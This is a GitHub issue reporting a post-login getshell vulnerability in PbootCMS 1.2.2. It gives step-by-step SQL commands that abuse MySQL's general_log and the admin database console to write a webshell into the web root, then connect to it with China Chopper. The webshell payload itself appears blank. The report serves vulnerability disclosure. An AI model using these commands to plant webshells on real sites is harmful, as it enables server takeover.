Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pbootcms1.2.2 background execution sql statement getshell vulnerability, database management module + mysql GLOBAL general_log #2

Open
myzing00 opened this issue Nov 6, 2018 · 0 comments

Comments

@myzing00
Copy link

myzing00 commented Nov 6, 2018

There is a getshell vulnerability here, the integrated database management module executes the sql statement + mysql GLOBAL general_log function,Pbootcms version 1.2.2
1.The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms\static\backup\sql\20180720164810_pbootcms.sql

2.Open http://127.0.0.1/PbootCMS/admin.php in the browser and enter the account password to enter the background..
username=admin
password=123456
image

http://127.0.0.1/PbootCMS/admin.php/Site/server Can get the absolute path of the server
image
E:/Pentest_tool/phpStudy/PHPTutorial/WWW/PbootCMS/

Database management module
http://127.0.0.1/PbootCMS/admin.php/Database/index
image
Here you can enter any sql statement,

Use mysql GLOBAL general_log write webshell

1.SET GLOBAL general_log = 'On';
image

2.Set the log file path
SET GLOBAL general_log_file = 'E:\Pentest_tool\phpStudy\PHPTutorial\WWW\PbootCMS\1.php';
image

3.Enter a select statement with a sentence webshell
select ;
image
image
image
The webshell has been written to the log file 1.php
Connect to webshell using china chopper
image

PS:Cannot write to webshell via export file, because mysql defaults to secure-file-priv

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant